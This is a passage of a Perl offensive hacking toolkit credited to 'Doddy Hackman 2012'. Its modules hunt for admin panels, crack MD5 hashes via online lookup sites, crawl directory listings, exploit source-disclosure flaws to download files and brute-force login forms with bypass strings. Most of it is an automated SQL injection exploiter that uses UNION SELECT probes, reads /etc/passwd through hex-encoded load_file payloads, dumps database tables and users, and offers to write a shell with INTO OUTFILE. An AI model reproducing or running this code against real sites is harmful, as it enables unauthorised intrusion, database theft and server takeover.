274. cprint("\x03".$_[2].$_[0]."\x030");
275. }
276. elsif ($_[1] eq "stdin") {
277. if ($_[3] ne "") {
278. cprint("\x03".$_[2].$_[0]."\x030"."\x03".$_[3]);
279. my $op = <stdin>;
280. chomp $op;
281. cprint ("\x030");
282. return $op;
283. }
284. }
285. else {
286. print "error\n";
287. }
288. } else { #
289. if ($_[1] eq "text") {
290. print($_[0]);
291. }
292. elsif ($_[1] eq "stdin") {
293. if ($_[3] ne "") {
294. cprint($_[0]);
295. my $op = <stdin>;
296. chomp $op;
297. return $op;
298. }
299. }
300. }
301. } #Fin de printear
302.  
303. sub clean {
304. my $os = $^O;
305. if ($os =~/Win32/ig) {
306. system("cls");
307. } else {
308. system("clear");
309. }
310. }
311.  
312. sub copyright_menu {
313. printear("\n\n\t\t\t(C) Doddy Hackman 2012\n\n","text","11","5");
314. exit(1);
315. }
316.  
317. ##Funciones del programa ##
318.  
319. sub start_panel {
320.  
321. head_panel();
322. my $page  = printear("[+] Page : ","stdin","11","13");
323. my $count  = printear("\n[+] Count : ","stdin","11","13");
324.  
325. if($count eq "") {
326. $count = 3;
327. }
328.  
329. scan_panel($page,$count);
330. printear("\n\n[+] Finished\n\n","text","13","5");
331. <stdin>;
332. estoydentro();
333.  
334. }
335.  
336. sub scan_panel {
337.  
338. my $count = 0;
339.  
340. printear("\n\n[+] Searching .....\n\n\n","text","13","5");
341.  
342. for my $path(@paneles) {
343.  
344. if($count eq $_[1]) {
345. last;
346. }
347.  
348. $code = tomados($_[0]."/".$path);
349.  
350. if ($code->is_success) {
351. $controlt = 1;
352. $count++;
353. printear("\a\a[Link] : ".$_[0]."/".$path."\n","text","7","5");
354. #savefile("admins_logs.txt",$_[0]."/".$path);
355. }
356.  
357. }
358.  
359. if ($controlt ne 1) {
360. printear("[-] Not found anything\n","text","5","5");
361. }
362.  
363. } ##
364.  
365. sub head_panel {
366. printear("
367.  
368.  
369. @@@@@                    @     @@@@                          @
370. @    @                   @    @    @             @           @
371. @    @                   @    @                  @           @
372. @    @  @@@  @ @@   @@@  @    @       @@@  @ @@  @@ @@  @@@  @
373. @@@@@      @ @@  @ @   @ @    @      @   @ @@  @ @  @  @   @ @
374. @       @@@@ @   @ @@@@@ @    @      @   @ @   @ @  @  @   @ @
375. @      @   @ @   @ @     @    @      @   @ @   @ @  @  @   @ @
376. @      @   @ @   @ @   @ @    @    @ @   @ @   @ @  @  @   @ @
377. @       @@@@ @   @  @@@  @     @@@@   @@@  @   @  @ @   @@@  @
378.  
379.  
380.                                                    
381. ","text","7","5");
382. }
383.  
384. sub menu_crackhash {
385.  
386. head_crackhash();
387.  
388. my $op  = printear("[+] Option : ","stdin","11","13");
389.  
390. if ($op eq "1") {
391. my $ha  = printear("\n\n[+] Hash : ","stdin","11","13");
392. if (ver_length($ha)) {
393. printear("\n\n[+] Cracking Hash...\n","text","13","5");
394. my $re = crackit($ha);
395. unless($re=~/false01/) {
396. printear("\n\n[+] Cracked : $re\n\n","text","7","5");
397. savefile("hashes-found.txt",$ha.":".$re);
398. } else {
399. printear("\n[-] Not Found\n\n","text","5","5");
400. }
401. } else {
402. printear("\n\n[-] Hash invalid\n\n","text","5","5");
403. }
404. printear("\n[+] Finished","text","13","5");
405. <stdin>;
406. menu_crackhash();
407. }
408. if ($op eq "2") {
409. my $fi  = printear("\n\n[+] Wordlist : ","stdin","11","13");
410. if (-f $fi) {
411. printear("\n\n[+] Opening File\n","text","13","5");
412. open(WORD,$fi);
413. my @varios = <WORD>;
414. close WORD;
415. my @varios = repes(@varios);
416.     printear("[+] Hashes Found : ".int(@varios),"text","13","5");
417. printear("\n\n[+] Cracking hashes...\n\n","text","13","5");
418. for $hash(@varios) {
419. chomp $hash;
420. if (ver_length($hash)) {
421. my $re = crackit($hash);
422. unless($re=~/false01/) {
423. printear("[+] $hash : $re\n","text","7","5");
424. savefile("hashes-found.txt",$hash.":".$re);
425. }}}
426. } else {
427. printear("\n\n[-] File Not Found\n\n","text","5","5");
428. }
429. printear("\n[+] Finished","text","13","5");
430. <stdin>;
431. menu_crackhash();
432. }
433. if ($op eq "3") {
434. printear("\n\n[+] Finished\n\n","text","13","5");
435. <stdin>;
436. estoydentro();
437. }}
438.  
439. sub crackit {
440.  
441. my $target = shift;
442.  
443. chomp $target;
444.  
445. my %hash = (
446.      
447. 'http://md5.hashcracking.com/search.php?md5=' =>  {
448. 'tipo' => 'get',
449. 'regex' => "Cleartext of $target is (.*)",
450. },
451.  
452. 'http://www.hashchecker.com/index.php?_sls=search_hash' =>  {  
453. 'variables'=>{'search_field'=>$target,'Submit'=>'search'},
454. 'regex' => "<td><li>Your md5 hash is :<br><li>$target is <b>(.*)<\/b>",
455. },
456.  
457. 'http://md5.rednoize.com/?q=' =>  {    
458. 'tipo'=> 'get',
459. 'regex' => "<div id=\"result\" >(.*)<\/div>"
460. },
461.  
462. 'http://md52.altervista.org/index.php?md5=' =>  {  
463. 'tipo'=> 'get',
464. 'regex' => "<br>Password: <font color=\"Red\">(.*)<\/font><\/b>"
465. }
466.  
467. );
468.  
469. for my $data(keys %hash) {
470. if ($hash{$data}{tipo} eq "get") {
471. $code = toma($data.$target);
472. if ($code=~/$hash{$data}{regex}/ig) {
473. my $found = $1;
474. unless($found=~/\[Non Trovata\]/) {
475. return $found;
476. last;
477. }}}
478. else {
479. $code = tomar($data,$hash{$data}{variables});
480. if ($code=~/$hash{$data}{regex}/ig) {
481. my $found = $1;
482. return $found;
483. last;
484. }}}
485. return "false01";
486. }
487.  
488. sub head_crackhash {
489. clean();
490. printear("
491.  
492.  
493. ##########  #########  #########     #####   #    ###  ###
494. #  # #  ##  #  #   #   #  # #  #     #  #   #   #  # #  #
495. #    #  ##  #  #    #  #    #  #     #  #  # #  #    #  
496. ###  #  # # #  #    #  ###  ###      ###   # #   ##   ##
497. #    #  # # #  #    #  #    # #      #    #####    #    #
498. #    #  #  ##  #   #   #  # #  #     #    #   # #  # #  #
499. ###  ######  # #####   ########  #   ###  ### ######  ###
500.  
501.  
502.  
503. ","text","5","5");
504. printear("
505. [++] Options
506.  
507.  
508. [+] 1 : Hash
509. [+] 2 : File with hashes
510. [+] 3 : Exit
511.  
512.  
513. ","text","3","5");
514. } ##
515.  
516. sub load_locateip {
517.  
518. head_locateip();
519. my $page  = printear("[+] Page : ","stdin","11","13");
520. infocon($page);
521. printear("\n\n[+] Finished\n\n","text","13","5");
522. <stdin>;
523. estoydentro();
524.  
525. sub head_locateip {
526. clean();
527. printear("
528.  
529.  
530.  
531. @      @@@@    @@@@    @    @@@@@  @@@@@     @  @@@@@
532. @     @    @  @    @   @      @    @         @  @    @
533. @     @    @  @       @ @     @    @         @  @    @
534. @     @    @  @       @ @     @    @         @  @    @
535. @     @    @  @      @   @    @    @@@@      @  @@@@@
536. @     @    @  @      @   @    @    @         @  @    
537. @     @    @  @      @@@@@    @    @         @  @    
538. @     @    @  @    @@     @   @    @         @  @    
539. @@@@@  @@@@    @@@@ @     @   @    @@@@@     @  @    
540.  
541.  
542.  
543. ","text","7","5");
544. }
545.  
546. sub infocon {
547. my $target = shift;
548.  
549. my $get    = gethostbyname($target);
550. my $target = inet_ntoa($get);
551.  
552. printear("\n\n[+] Getting info\n\n\n","text","13","5");
553.  
554. $total = "http://www.melissadata.com/lookups/iplocation.asp?ipaddress=$target";
555. $re    = toma($total);
556.  
557. if ( $re =~ /City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
558. printear("[+] City : $2\n","text","7","5");
559. }
560. else {
561. printear("[-] Not Found\n","text","5","5");
562. printear("\n\n[+] Finished\n\n","text","13","5");
563. <stdin>;
564. estoydentro();
565. }
566. if ( $re =~ /Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
567. printear("[+] Country : $2\n","text","7","5");
568. }
569. if ( $re =~ /State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
570. printear("[+] State or Region : $2\n","text","7","5");
571. }
572.  
573. printear("\n\n[+] Getting Hosts\n\n\n","text","13","5");
574.  
575. my $code = toma( "http://www.ip-adress.com/reverse_ip/" . $target );
576.  
577. while ( $code =~ /whois\/(.*?)\">Whois/g ) {
578. my $dns = $1;
579. chomp $dns;
580. printear("[DNS] : $dns\n","text","7","5");
581. }
582. }
583.  
584. } ##
585.  
586. ##
587.  
588. sub load_findpaths {
589.  
590. head_paths();
591. my $web  = printear("[+] Web : ","stdin","11","13");
592. printear("\n\n[+] Scan Type\n\n","text","5","5");
593. printear("[+] 1 : Fast\n","text","3","5");
594. printear("[+] 2 : Full\n","text","3","5");
595. my $op  = printear("\n\n[+] Option : ","stdin","11","13");
596. printear("\n\n[+] Scanning ....\n\n\n","text","13","5");
597.  
598. if($op eq "1") {
599. simple($web);
600. }
601. elsif ($op eq "2") {
602. escalar($web);
603. } else {
604. simplex($web);
605. }
606. printear("\n\n[+] Finished\n\n","text","13","5");
607. <stdin>;
608. estoydentro();
609.  
610. sub escalar {
611.  
612. my $co = $_[0];
613. my $code  = toma( $_[0] );
614. my @links = get_links($code);
615.  
616. if ( $code =~ /Index of (.*)/ig ) {
617. printear("[+] Link : $co\n","text","7","5");
618. savefile("paths-logs.txt",$co);
619. my $dir_found = $1;
620. chomp $dir_found;
621. while ( $code =~ /<a href=\"(.*)\">(.*)<\/a>/ig ) {
622. my $ruta   = $1;
623. my $nombre = $2;
624. unless ( $nombre =~ /Parent Directory/ig or $nombre =~ /Description/ig ) {
625. push(@encontrados,$_[0]."/".$nombre);
626. }}}
627.  
628. for my $com (@links) {
629. my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
630. if ( $path =~ /\/(.*)$/ ) {
631. my $path1 = $1;
632. $_[0] =~ s/$path1//ig;
633. my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
634. if ( $path =~ /(.*)\// ) {
635. my $parche = $1;                                
636. unless($repetidos=~/$parche/){
637. $repetidos.=" ".$parche;
638. my $yeah = "http://".$auth.$parche;
639. escalar($yeah);                    
640. }}
641. for(@encontrados) {
642. escalar($_);
643. }}}}
644.  
645. sub simplex {
646.  
647. my $code  = toma($_[0]);
648. my @links = get_links($code);
649.  
650. for my $com (@links) {
651. my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
652. if ( $path =~ /\/(.*)$/ ) {
653. my $path1 = $1;
654. $_[0] =~ s/$path1//ig;
655. my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
656. if ( $path =~ /(.*)\// ) {
657. my $parche = $1;                                
658. unless($repetidos=~/$parche/){
659. $repetidos.=" ".$parche;
660. my $code=toma("http://".$auth.$parche);    
661.  
662. if ( $code =~ /Index of (.*)</ig ) {
663. my $dir_found = $1;
664. chomp $dir_found;
665. my $yeah = "http://".$auth.$parche;
666. printear("[+] Link : $yeah\n","text","7","5");
667. savefile("paths-logs.txt",$yeah);
668. }}}}}}
669.  
670. sub head_paths {
671. clean();
672. printear("
673.  
674.  
675. @@@@@ @           @             @@@@@           @        
676. @                 @             @    @       @  @        
677. @                 @             @    @       @  @        
678. @     @ @ @@   @@@@  @@@  @@    @    @  @@@  @@ @ @@   @@
679. @@@@  @ @@  @ @   @ @   @ @     @@@@@      @ @  @@  @ @  @
680. @     @ @   @ @   @ @@@@@ @     @       @@@@ @  @   @  @  
681. @     @ @   @ @   @ @     @     @      @   @ @  @   @   @
682. @     @ @   @ @   @ @   @ @     @      @   @ @  @   @ @  @
683. @     @ @   @  @@@@  @@@  @     @       @@@@  @ @   @  @@
684.  
685.  
686.  
687.  
688.  
689. ","text","7","5");
690. }
691.  
692. } ##
693.  
694. sub load_fsd {
695.  
696. head_fsd();
697. my $page  = printear("[+] Page : ","stdin","11","13");
698. ver_now_now($page);
699. printear("\n\n[+] Finished\n\n","text","13","5");
700. <stdin>;
701. estoydentro();
702.  
703. sub ver_now_now {
704.  
705. my $page = shift;
706.  
707. printear("\n[+] Target : ".$page."\n\n","text","13","5");
708.  
709. my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
710.  
711. if ($path=~/\/(.*)$/) {
712. my $me = $1;
713. $code1 = toma($page.$me);
714. if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
715. printear("[+] Full Source Discloure Detect\a\n","text","7","5");
716. $code2 = toma($page."'");
717. if ($code2=~/No such file or directory in <b>(.*)<\/b> on line/) {
718. printear("\n[+] Full Path Dislocure Detect : ".$1."\n","text","7","5");
719. }
720. installer_fsd();
721. while(1) {
722. my $url  = printear("\n\nURL>","stdin","11","13");
723. if($url eq "exit") {
724. adios();
725. }
726. if (download($page.$url,"fsdlogs/".basename($url))) {
727. printear("\n\n[+] File Downloaded\n","text","13","5");
728. system("start fsdlogs/".basename($url));
729. }
730. }
731. } else {
732. printear("[-] Web not vulnerable\n\n","text","5","5");
733. }
734. }
735. }
736.  
737. sub adios {
738. printear("\n\n[+] Finished\n\n","text","13","5");
739. <stdin>;
740. estoydentro();
741. }
742.  
743. sub head_fsd {
744. clean();
745. printear("
746.  
747.  
748. @@@@@  @@@   @@@@       @@@@@ @     @ @@@@@  @      @@@@   @  @@@@@
749. @     @   @  @   @      @     @     @ @    @ @     @    @  @    @  
750. @     @      @    @     @      @   @  @    @ @     @    @  @    @  
751. @     @      @    @     @       @ @   @    @ @     @    @  @    @  
752. @@@@   @@@   @    @     @@@@     @    @@@@@  @     @    @  @    @  
753. @         @  @    @     @       @ @   @      @     @    @  @    @  
754. @         @  @    @     @      @   @  @      @     @    @  @    @  
755. @     @   @  @   @      @     @     @ @      @     @    @  @    @  
756. @      @@@   @@@@       @@@@@ @     @ @      @@@@@  @@@@   @    @  
757.  
758.  
759.  
760.  
761. ","text","7","5");
762. }
763.  
764. sub download {
765. if ($nave->mirror($_[0],$_[1])) {
766. if (-f $_[1]) {
767. return true;
768. }}}
769.  
770. sub installer_fsd {
771. unless (-d "fsdlogs/") {
772. mkdir("fsdlogs/","777");
773. }}
774.  
775. } ##
776.  
777. sub load_bypass {
778.  
779. head_bypass();
780. start_com();
781. printear("\n\n[+] Finished\n\n","text","13","5");
782. <stdin>;
783. estoydentro();
784.  
785. sub start_com {
786. my $url  = printear("\n\n[+] Admin : ","stdin","11","13");
787.  
788. my $code = toma($url);
789.  
790. my @testar = HTML::Form->parse($code,"/");
791.  
792. $count = 0;
793. foreach my $test(@testar) {
794. $count++;
795. printear("\n\n -- == Form $count == --\n\n","text","5","5");
796. if ($test->attr(name) eq "") {
797. printear("[+] Name : No Found"."\n","text","13","5");
798. } else {
799. printear("[+] Name : ".$test->attr(name)."\n","text","13","5");
800. }
801. printear("[+] Action : ".$test->action."\n","text","13","5");
802. printear("[+] Method : ".$test->method."\n","text","13","5");
803. printear("\n-- == Input == --\n\n","text","5","5");
804. @inputs = $test->inputs;
805.  
806. foreach $in(@inputs) {
807. printear("\n[+] Type : ".$in->type."\n","text","13","5");
808. printear("[+] Name : ".$in->name."\n","text","13","5");
809. printear("[+] Value : ".$in->value."\n","text","13","5");
810. }
811. }
812.  
813. my $op  = printear("\n\n[+] Form to crack : ","stdin","11","13");
814. my $aca  = printear("\n[+] Submit : ","stdin","11","13");
815.  
816. printear("\n[+] Options to check\n\n","text","5","5");
817. printear("1 - Positive\n","text","13","5");
818. printear("2 - Negative\n","text","13","5");
819. printear("3 - Automatic\n\n","text","13","5");
820. my $op2  = printear("[+] Option : ","stdin","11","13");
821.  
822. my @bypass = loadwordsa();
823.  
824. if($op2 eq "1") {
825. my $st  = printear("\n[+] String : ","stdin","11","13");
826. printear("\n\n[+] Cracking login....\n\n","text","13","5");
827. for my $by(@bypass) {
828. chomp $by;
829. my $code = load_nownow($url,$code,$op,$aca,$by);
830. if($code=~/$st/ig) {
831. cracked($url,$by);
832. }}
833. printear("\n\n[+] Finished\n\n","text","13","5");
834. <stdin>;
835. estoydentro();
836. }
837.  
838. if($op2 eq "2") {
839. my $st  = printear("\n[+] String : ","stdin","11","13");
840. printear("\n\n[+] Cracking login....\n\n","text","13","5");
841. for my $by(@bypass) {
842. chomp $by;
843. my $code = load_nownow($url,$code,$op,$aca,$by);
844. unless($code=~/$st/ig) {
845. cracked($url,$by);
846. }}
847. printear("\n\n[+] Finished\n\n","text","13","5");
848. <stdin>;
849. estoydentro();
850. }
851.  
852. if ($op2 eq "3") {
853. printear("\n\n[+] Cracking login....\n\n","text","13","5");
854. my $prueba_falsa = load_nownow($url,$code,$op,$aca,"fuck you");
855. for my $by(@bypass) {
856. chomp $by;
857. my $code = load_nownow($url,$code,$op,$aca,$by);
858. unless($code eq $prueba_falsa) {
859. cracked($url,$by);
860. }}
861. printear("\n\n[+] Finished\n\n","text","13","5");
862. <stdin>;
863. estoydentro();
864. }
865. }
866.  
867. sub load_nownow {
868.  
869. my($url,$code,$op,$aca,$text) = @_;
870.  
871. $op--;
872. my @probar = (HTML::Form->parse($code,"/"))[$op];
873.    
874. for my $testa(@probar) {
875. if ($testa->method eq "POST") {
876.  
877. my @inputs = $testa->inputs;
878. for my $in(@inputs) {
879. if ($in->type eq "submit") {
880. if ($in->name eq $aca) {
881. push(@botones_names,$in->name);
882. push(@botones_values,$in->value);
883. }
884. } else {
885. push(@ordenuno,$in->name,$text);
886. }}
887.  
888. my @preuno = @ordenuno;
889. push(@preuno,$botones_names[0],$botones_values[0]);
890. my $codeuno = $nave->post($url,\@preuno)->content;
891.  
892. return $codeuno;
893.  
894. } else {
895.  
896. my $final = "";
897. my $orden = "";
898. my $partedos = "";
899.  
900. my @inputs = $testa->inputs;
901. for my $testa(@inputs) {
902.  
903. if ($testa->name eq $aca) {
904.  
905. push(@botones_names,$testa->name);
906. push(@botones_values,$testa->value);
907. } else {
908. $orden.=''.$testa->name.'='.$text.'&';
909. }}
910. chop($orden);
911.  
912. my $partedos = "&".$botones_names[0]."=".$botones_values[0];
913. my $final = $url."?".$orden.$partedos;
914.  
915. $codedos = toma($final);
916. return $codedos;
917. }}}
918.  
919. sub cracked {
920. printear("\a\a[+] Login Cracked\n\n","text","7","5");
921. printear("[+] URL : $_[0]\n","text","7","5");
922. printear("[+] Bypass : $_[1]\n","text","7","5");
923. savefile("logs-bypass.txt","[+] URL : $_[0]");
924. savefile("logs-bypass.txt","[+] Bypass : $_[1]\n");
925. printear("\n\n[+] Finished\n\n","text","13","5");
926. <stdin>;
927. estoydentro();
928. }
929.  
930. sub loadwordsa {
931.  
932. my  $file = "bypass.txt";
933.  
934. if(-f $file) {
935.  
936. open(FI,"bypass.txt");
937. my @txts = <FI>;
938. close FI;
939. chomp @txts;
940.  
941. return @txts;
942.  
943. } else {
944. printear("\n\n[-] Wordlist not found\n\n","text","5","5");
945. }
946.  
947. }
948.  
949. sub head_bypass {
950. clean();
951. printear("
952.  
953. @@@@        @@@@@                       @        @         @      
954. @   @       @    @                      @        @                
955. @   @       @    @                     @ @       @                
956. @   @  @  @ @    @  @@@   @@   @@      @ @    @@@@ @@@ @@  @ @ @@
957. @@@@   @  @ @@@@@      @ @  @ @  @    @   @  @   @ @  @  @ @ @@  @
958. @   @  @  @ @       @@@@  @    @      @   @  @   @ @  @  @ @ @   @
959. @   @  @  @ @      @   @   @    @     @@@@@  @   @ @  @  @ @ @   @
960. @   @   @@  @      @   @ @  @ @  @   @     @ @   @ @  @  @ @ @   @
961. @@@@    @   @       @@@@  @@   @@    @     @  @@@@ @  @  @ @ @   @
962.         @                                                        
963.       @@                                                          
964.  
965.  
966.  
967. ","text","7","5");
968. }
969.  
970. } ##
971.  
972. sub load_kobra {
973.  
974. installer_kobra();
975. clean();
976.  
977. &head_kobra;
978. &menu_kobra;
979.  
980. printear("\n\n[+] Finished\n\n","text","13","5");
981. <stdin>;
982. estoydentro();
983.  
984. sub menu_kobra {
985. my $page  = printear("[Page] : ","stdin","11","13");
986. my $bypass  = printear("\n[Bypass : -- /* %20] : ","stdin","11","13");
987. print "\n\n";
988. if($page eq "exit") {
989. printear("\n\n[+] Finished\n\n","text","13","5");
990. <stdin>;
991. estoydentro();
992. }
993. &scan_kobra($page,$bypass);
994. }
995.  
996. sub scan_kobra {
997. my $page = $_[0];
998. printear("[Status] : Scanning.....\n","text","13","5");
999. ($pass1,$bypass2) = &bypass($_[1]);
1000.  
1001. my $save = partimealmedio($_[0]);
1002.  
1003. if ($_[0]=~/hackman/ig) {
1004. savefilear($save.".txt","\n[Target Confirmed] : $_[0]\n");
1005. &menu_options($_[0],$_[1],$save);
1006. }
1007.  
1008. my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2);
1009. my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2);
1010.  
1011. unless ($testar1 eq $testar2) {
1012. motor($page,$_[1]);
1013. } else {
1014. printear("\n[-] Not vulnerable\n\n","text","5","5");
1015. my $op  = printear("[+] Scan anyway y/n : ","stdin","11","13");
1016. if ($op eq "y") {
1017. motor($page,$_[1]);
1018. } else {
1019. head_kobra();
1020. menu_kobra();
1021. }
1022. }
1023.  
1024. }
1025.  
1026. sub motor {
1027.  
1028. my ($gen,$save,$control) = &length($_[0],$_[1]);
1029.  
1030. if ($control eq 1) {
1031. printear("\n[Status] : Enjoy the menu\n\n","text","13","5");
1032. &menu_options($gen,$_[1],$save);
1033. } else {
1034. printear("[Status] : Length columns not found\n\n","text","5","5");
1035. <STDIN>;
1036. &head_kobra;
1037. &menu_kobra;
1038. }
1039. }
1040.  
1041. sub head_kobra {
1042. clean();
1043. printear("
1044. @      @@   @            
1045. @@     @  @ @@            
1046. @ @@  @  @  @ @   @ @ @@@
1047. @ @   @  @  @@ @ @@@ @  @
1048. @@    @  @  @  @  @   @@@
1049. @ @   @  @  @  @  @  @  @
1050. @@@ @   @@   @@@  @@@ @@@@@
1051.  
1052.  
1053.  
1054.  
1055. ","text","7","5");
1056. }
1057.  
1058. sub length {
1059. printear("\n[+] Looking for the number of columns\n\n","text","13","5");
1060. my $rows  = "0";
1061. my $asc;
1062. my $page = $_[0];
1063. ($pass1,$pass2) = &bypass($_[1]);
1064.  
1065. $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
1066. $total = "1";
1067. for my $rows(2..200) {
1068. $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
1069. $total.= ",".$rows;
1070. $injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
1071. $test = toma($injection);
1072. if ($test=~/RATSXPDOWN/) {
1073. @number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
1074. $control = 1;
1075.  
1076. my $save = partimealmedio($_[0]);
1077.  
1078. savefilear($save.".txt","\n[Target confirmed] : $page");
1079. savefilear($save.".txt","[Bypass] : $_[1]\n");
1080. savefilear($save.".txt","[Limit] : The site has $rows columns");
1081. savefilear($save.".txt","[Data] : The number @number print data");
1082. $total=~s/$number[0]/hackman/;
1083. savefilear($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
1084. return($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
1085. }
1086. }
1087. }
1088.  
1089. sub details {
1090. my ($page,$bypass,$save) = @_;
1091. ($pass1,$pass2) = &bypass($bypass);
1092. savefilear($save.".txt","\n");
1093. if ($page=~/(.*)hackman(.*)/ig) {
1094. printear("[+] Searching information..\n\n","text","13","5");
1095. my  ($start,$end) = ($1,$2);
1096. $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
1097. $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
1098. $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
1099. $test1 = toma($inforschema);
1100. $test2 = toma($mysqluser);
1101. if ($test2=~/ERTOR854/ig) {
1102. savefilear($save.".txt","[mysql.user] : ON");
1103. printear("[mysql.user] : ON\n","text","7","5");
1104. } else {
1105. printear("[mysql.user] : OFF\n","text","5","5");
1106. savefilear($save.".txt","[mysql.user] : OFF");
1107. }
1108. if ($test1=~/ERTOR854/ig) {
1109. printear("[information_schema.tables] : ON\n","text","7","5");
1110. savefilear($save.".txt","[information_schema.tables] : ON");
1111. } else {
1112. printear("[information_schema.tables] : OFF\n","text","5","5");
1113. savefilear($save.".txt","[information_schema.tables] : OFF");
1114. }
1115. if ($test3=~/ERTOR854/ig) {
1116. printear("[load_file] : ON\n","text","7","5");
1117. savefilear($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
1118. }
1119. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
1120. $injection = $start.$concat.$end.$pass2;
1121. $code = toma($injection);
1122. if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
1123. printear("\n[!] DB Version : $1\n[!] DB Name : $2\n[!] Username : $3\n\n","text","7","5");
1124. savefilear($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] Username : $3\n");
1125. } else {
1126. printear("\n[-] Not found any data\n","text","5","5");
1127. }
1128. }
1129. }
1130.  
1131. sub menu_options {
1132.  
1133. my $testarnownow = $_[0]; ## Comment on this line to compile to exe
1134. $SIG{INT} = sub { reload($testarnownow) }; ## Comment on this line to compile to exe
1135.  
1136. head_kobra();
1137.  
1138. printear("[Target confirmed] : $_[0]\n","text","11","5");
1139. printear("[Bypass] : $_[1]\n\n","text","11","5");
1140.  
1141. my $save = partimealmedio($_[0]);
1142.  
1143. printear("[save] : /logs/webs/$save\n\n","text","11","5");
1144.  
1145. printear("\n--== information_schema.tables ==--\n\n","text","5","5");
1146. printear("[1] : Show tables\n","text","13","5");
1147. printear("[2] : Show columns\n","text","13","5");
1148. printear("[3] : Show DBS\n","text","13","5");
1149. printear("[4] : Show tables with other DB\n","text","13","5");
1150. printear("[5] : Show columns with other DB","text","13","5");
1151. printear("\n\n--== mysql.user ==--\n\n","text","5","5");
1152. printear("[6] : Show users\n","text","13","5");
1153. printear("\n--== Others ==--\n\n","text","5","5");
1154. printear("[7] : Fuzz tables\n","text","13","5");
1155. printear("[8] : Fuzz Columns\n","text","13","5");
1156. printear("[9] : Fuzzing files with load_file\n","text","13","5");
1157. printear("[10] : Read a file with load_file\n","text","13","5");
1158. printear("[11] : Dump\n","text","13","5");
1159. printear("[12] : Informacion of the server\n","text","13","5");
1160. printear("[13] : Create a shell with into outfile\n","text","13","5");
1161. printear("[14] : Show Log\n","text","13","5");
1162. printear("[15] : Change Target\n","text","13","5");
1163. printear("[16] : Exit\n","text","13","5");
1164.  
1165. my $opcion  = printear("\n\n[Option] : ","stdin","11","13");
1166.  
1167. if ($opcion eq "1") {
1168. schematables($_[0],$_[1],$save);
1169. &reload;   
1170. }
1171. elsif ($opcion eq "2") {
1172. my $tabla  = printear("\n\n[Table] : ","stdin","11","13");
1173. schemacolumns($_[0],$_[1],$save,$tabla);
1174. &reload;
1175. }
1176. elsif ($opcion eq "3") {
1177. &schemadb($_[0],$_[1],$save);
1178. &reload;
1179. }
1180. elsif ($opcion eq "4") {
1181. my $data  = printear("\n\n[DAtabase] : ","stdin","11","13");
1182. &schematablesdb($_[0],$_[1],$data,$save);
1183. &reload;
1184. }
1185. elsif ($opcion eq "5"){
1186. my $db  = printear("\n\n[DB] : ","stdin","11","13");
1187. my $table  = printear("\n[Table] : ","stdin","11","13");
1188. &schemacolumnsdb($_[0],$_[1],$db,$table,$save);
1189. &reload;
1190. }
1191. elsif ($opcion eq "6") {
1192. &mysqluser($_[0],$_[1],$save);
1193. &reload;
1194. }
1195. elsif ($opcion eq "7") { ##
1196. &fuzz($_[0],$_[1],$save);
1197. &reload;
1198. }
1199. elsif ($opcion eq "8") { ##
1200. my $table  = printear("\n\n[Table] : ","stdin","11","13");
1201. &fuzzcol($_[0],$_[1],$table,$save);
1202. &reload;
1203. }
1204. elsif ($opcion eq "9") {
1205. &load($_[0],$_[1],$save);
1206. &reload;
1207. }
1208. elsif ($opcion eq "10") {
1209. &loadfile($_[0],$_[1],$save);
1210. &reload;
1211. }
1212. elsif ($opcion eq "11") {
1213. my $tabla  = printear("\n\n[Table to dump] : ","stdin","11","13");
1214. my $col1  = printear("\n[Column 1] : ","stdin","11","13");
1215. my $col2  = printear("\n[Column 2] : ","stdin","11","13");
1216. print "\n\n";
1217. &dump($_[0],$col1,$col2,$tabla,$_[1],$save);
1218. &reload;
1219. }
1220. elsif ($opcion eq "12") {
1221. print "\n\n";
1222. &details($_[0],$_[1],$save);
1223. &reload;
1224. }
1225. elsif ($opcion eq "13") {
1226. my $path  = printear("\n\n[Full Path Discloure] : ","stdin","11","13");
1227. &into($_[0],$_[1],$path,$save);
1228. &reload;
1229. }
1230. elsif ($opcion eq "14") {
1231. $t = "logs/webs/$save.txt";
1232. system("start $t");
1233. &reload;
1234. }
1235. elsif ($opcion eq "15") {
1236. &head_kobra;
1237. &menu_kobra;
1238. }
1239.  
1240. elsif ($opcion eq "16") {
1241. printear("\n\n[+] Finished\n\n","text","13","5");
1242. <stdin>;
1243. estoydentro();
1244. }
1245. else {
1246. &reload;
1247. }
1248. }
1249.  
1250. sub schematables {
1251.  
1252. $real = "1";
1253. my ($page,$bypass,$save) = @_;
1254. savefilear($save.".txt","\n");
1255. print "\n";
1256. my $page1 = $page;
1257. ($pass1,$pass2) = &bypass($_[1]);
1258. savefilear($save.".txt","[DB] : default");
